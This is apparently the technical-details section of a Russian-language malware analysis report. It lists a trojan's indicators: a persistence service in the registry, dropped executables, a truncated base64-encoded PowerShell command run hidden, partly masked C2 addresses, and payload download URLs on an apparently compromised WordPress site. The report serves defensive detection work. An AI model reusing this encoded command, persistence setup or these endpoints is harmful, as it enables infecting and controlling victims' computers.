Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\KBDUGHR] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\KBDUGHR] 'ImagePath' = '"%WINDIR%\SysWOW64\NlsData0816\KBDUGHR.exe"'
- 'KBDUGHR' "%WINDIR%\SysWOW64\NlsData0816\KBDUGHR.exe"
- 'KBDUGHR' %WINDIR%\SysWOW64\NlsData0816\KBDUGHR.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGIAOQBqADAAYgB4AD0AKAAnAE0AbAAnACsAKAAnAGgAbQAxACcAKwAnADEAagAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAdABlAG0AcABcAFcAbwByAEQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...
- %TEMP%\word\2019\n3tnr9z.exe
- %WINDIR%\syswow64\nlsdata0816\kbdughr.exe
- %TEMP%\word\2019\n3tnr9z.exe в %WINDIR%\syswow64\nlsdata0816\kbdughr.exe
- '17#.#1.208.86':80
- '45.#5.36.51':443
- http://www.ve###itize.com/wp-includes/l9K6YJ/
- http://17#.#1.208.86/UZUB2oRrTccibnv/qyFrFwjqSpJTyUr/bPEc2VnKcZUwZ/24xnI0WDArHvx/
- http://45.##.36.51:443/qObb5dCNfg/u8SE7HoVWEEJ7dL/zxP7ec8g/8qRH/D6Bwqz1/ via 45.#5.36.51
- DNS ASK so####rucken.com
- DNS ASK ve###itize.com
- '%TEMP%\word\2019\n3tnr9z.exe'
- '%WINDIR%\syswow64\nlsdata0816\kbdughr.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGIAOQBqADAAYgB4AD0AKAAnAE0AbAAnACsAKAAnAGgAbQAxACcAKwAnADEAagAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAdABlAG0AcABcAFcAbwByAEQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...' (со скрытым окном)